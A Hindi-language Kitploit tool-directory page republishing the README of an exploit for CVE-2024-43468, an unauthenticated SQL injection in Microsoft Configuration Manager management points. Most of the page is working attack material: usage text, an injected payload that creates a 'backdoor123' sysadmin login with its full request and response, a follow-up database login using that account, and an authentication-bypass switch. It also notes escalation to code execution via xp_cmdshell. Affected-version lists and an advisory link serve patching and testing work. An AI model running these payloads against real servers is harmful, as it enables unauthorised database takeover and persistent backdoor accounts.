Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-43468 — CVE-2024-43468 के लिए एक्सप्लॉइट: Microsoft Configuration Manager Management Points में अप्रमाणित SQL इंजेक्शन, जो xp_cmdshell के माध्यम से मनमाना SQL निष्पादन और sysadmin तक विशेषाधिकार वृद्धि को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/synacktiv/cve-2024-43468
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubsynacktiv/cve-2024-43468

CVE-2024-43468

CVE-2024-43468 के लिए एक्सप्लॉइट: Microsoft Configuration Manager Management Points में अप्रमाणित SQL इंजेक्शन, जो xp_cmdshell के माध्यम से मनमाना SQL निष्पादन और sysadmin तक विशेषाधिकार वृद्धि को सक्षम करता है।

रिपॉजिटरी देखें
96134 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

माइक्रोसॉफ्ट कॉन्फ़िगरेशन मैनेजर (ConfigMgr / SCCM) 2403 अनप्रमाणित SQL इंजेक्शन (CVE-2024-43468) शोषण

यह स्क्रिप्ट CVE-2024-43468 का शोषण करती है, जो एक अनप्रमाणित हमलावर को, मैनेजमेंट पॉइंट तक नेटवर्क पहुँच के साथ, साइट डेटाबेस पर मनमानी SQL क्वेरी निष्पादित करने की अनुमति देती है।

चूंकि क्वेरीज़ MP मशीन अकाउंट पहचान के रूप में निष्पादित की जाती हैं, जिसे sysadmin भूमिका प्रदान की गई है, SQL इंजेक्शन को रिमोट कोड निष्पादन (उदाहरण के लिए xp_cmdshell के साथ) तक बढ़ाना तुच्छ है।

जब KB29166583 अनुपस्थित हो, तो निम्नलिखित सभी Microsoft Configuration Manager संस्करण संवेदनशील हैं:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211 (*)

अधिक जानकारी के लिए, कृपया https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections पर उपलब्ध संबंधित सलाह देखें।

आवश्यकताएँ

  • कुछ मामलों में, जब प्रबंधन बिंदु HTTPS Only संचार मोड के साथ कॉन्फ़िगर किया गया हो, तो संवेदनशील HTTP सेवा के विरुद्ध पारस्परिक TLS प्रमाणीकरण करने के लिए एक PKI प्रमाणपत्र आवश्यक है। आंतरिक PKI द्वारा Client Authentication उद्देश्य के साथ जारी किया गया कोई भी प्रमाणपत्र काम करेगा।
  • यदि आपके पास प्रमाणपत्र नहीं है, तो --altauth स्विच का उपयोग करें (यहाँ अधिक जानकारी)

उपयोग

root@kitploit:~
$ python3 CVE-2024-43468.py --help
usage: CVE-2024-43468.py [-h] -t TARGET -sql SQL [-machineid MACHINEID] -k KEY -c CERT

SCCM LocationMgr (MP_Location) Unauthenticated SQL injections - CVE-2024-43468

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target (http[s]://sccm-mp.local/)
  -sql SQL              Query to execute through the MachineID SQL injection (e.g create login user123 with password = 'p4sswOrd' ; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin' )
  -machineid MACHINEID  A valid MachineID for the second SQL injection via ContentID
  -k KEY, --key KEY     Private key file for mutual TLS
  -c CERT, --cert CERT  Certificate file for mutual TLS

  • एक नया व्यवस्थापक उपयोगकर्ता बनाएँ
root@kitploit:~
$ python3 CVE-2024-43468.py -t http://sccm.local -sql "create login backdoor123 with password = 'P@sswOrd1'; exec master.dbo.sp_addsrvrolemember 'backdoor123', 'sysadmin'"
>>>> Header <<<<<
<Msg ReplyCompression="zlib" SchemaVersion="1.1"><Body Type="ByteRange" Length="556" Offset="0" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook3 Name="zlib-compress" /></Hooks><ID>{00000000-0000-0000-0000-000000000000}</ID><Payload Type="inline"/><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:dummyEndpoint:LS_ReplyLocations</ReplyTo><TargetAddress>mp:[http]MP_LocationManager</TargetAddress><TargetEndpoint>MP_LocationManager</TargetEndpoint><TargetHost>http://sccm.local</TargetHost><Timeout>60000</Timeout><SourceID>GUID:3b47a05a-db2e-40ef-8c77-cf29dac2ca1e'; create login backdoor123 with password = 'P@sswOrd1'; exec master.dbo.sp_addsrvrolemember 'backdoor123', 'sysadmin' ; select '1 </SourceID></Msg>

>>>> Request <<<<<
<UpdateSFRequest><Package ID="UID:060cb19a-4dde-4c6a-b08b-7fee96c4824b" Version="1"></Package><ClientLocationInfo><BoundaryGroups><BoundaryGroup GroupID="1" GroupGUID="00000000-0000-0000-0000-000000000000" GroupFlag="0"/></BoundaryGroups></ClientLocationInfo></UpdateSFRequest>


>>>> Response : 200 <<<<<
--aAbBcCdDv1234567890VxXyYzZ
content-type: text/plain; charset=UTF-16

ÿþNoReply
--aAbBcCdDv1234567890VxXyYzZ--
  • इसके बाद, नवनिर्मित व्यवस्थापक के साथ SCCM डेटाबेस तक पहुँचें।
root@kitploit:~
$ mssqlclient.py  -debug './backdoor123:P@sswOrd1'@sccm-db.local
SQL (backdoor123  dbo@master)> use CM_ABC
SQL (backdoor123  dbo@CM_ABC)> select Name0 from v_R_System
Name0
------
DC
  • उस स्थिति में mTLS का उपयोग करें जब प्रबंधन बिंदु क्लाइंट प्रमाणपत्र माँगता है।
root@kitploit:~
$ python3 CVE-2024-43468.py -t https://sccm.local -sql "..."
[...]
>>>> Response : 403 Client certificate required <<<<<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

$ python3 CVE-2024-43468.py -k any_client1.key -c any_client1.pem -t https://sccm.local -sql "..."
>>>> Response : 200 <<<<<
--aAbBcCdDv1234567890VxXyYzZ
content-type: text/plain; charset=UTF-16

ÿþNoReply
--aAbBcCdDv1234567890VxXyYzZ--

altauth सेगमेंट के साथ mTLS प्रमाणीकरण को बायपास करें (यहाँ अधिक जानकारी)

root@kitploit:~
$ python3 CVE-2024-43468.py --altauth -t https://sccm.local -sql "..."
>>>> Response : 200 <<<<<
--aAbBcCdDv1234567890VxXyYzZ
content-type: text/plain; charset=UTF-16

ÿþNoReply
--aAbBcCdDv1234567890VxXyYzZ--

संदर्भ

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468
टूल डाउनलोड करें